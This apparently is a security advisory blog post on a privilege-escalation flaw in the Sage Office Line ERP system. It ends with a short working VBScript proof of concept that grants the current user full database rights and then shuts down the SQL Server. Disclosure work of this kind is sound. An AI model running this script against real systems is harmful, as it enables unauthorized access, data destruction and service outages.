Security Vulnerability in German ERP system "Sage office Line" Recently, I discovered a Securtiy Security Vulnerability in the German ERP system "Sage office Line", created by German branch of the UK-based Sage Group. The Software is sold in Germany, Austria and Switzerland. According to their website, Sage Germany has more than 250.000 customers. ------------------------- Affected products: ------------------------- - Sage Office Line Evolution 2012 (with newest patches installed) - Sage Office Line Evolution 2013 (with newest patches installed) - most likely previous versions (untested) ------------------------- Effects: ------------------------- - Code execution - privilege escalation - Data loss ------------------------- Details: ------------------------- The software is based on a Microsoft Access Frontend Client (available as ADE and ADP) and some server-based tools. Microsoft SQL Server is used to store all data. A typical client installation on the computer of each office worker contains the MS Access frontend and also many .Net assemblies called via COM-interop by the Access client. Main entry point for the Vulnerability is the so-called "mandator-object" which is initiated when a user logs in to the software. This object holds all information regarding the accessed database and also about the priviliges of the user. If a user has valid credentials to start the software, even if he has minimal permissions, he can use local VBScript and COM automation to gain full access to the mandator object. This object holds, among other interesting things, an ADO.NET connection object, which was instantiated with an SQL user with full rights on the affected database.Using the ADO.NET connection object, the user can give himself full permissions or even delete all data in the database. According to Sage Software, there is a feature called "Erweiterte Codesicherheit" ("Extended Code Security") which should secure the system by blocking non-signed code from accessing the System. The Feature has no effect on the vulnerability described in this post. ------------------------- Proof of Concept: ------------------------- The following code has to be saved local in a VBS file. Maybe it is necessary to adjust the path to the MS Access ADE file. It grants full access to the current user and then tries to shutdown the SQL server service. Set objAccess = GetObject("C:Program Files (x86)SageOffice Line6.1Abfolabf_001.ade") Set goMandant = objAccess.Run("goMandant") goMandant.oData.Execute "UPDATE USysSecurityClients SET Rights = 3 WHERE UserName='" & goMandant.oBenutzer.sName & "'" goMandant.oGlobalData.Execute "SHUTDOWN WITH NOWAIT"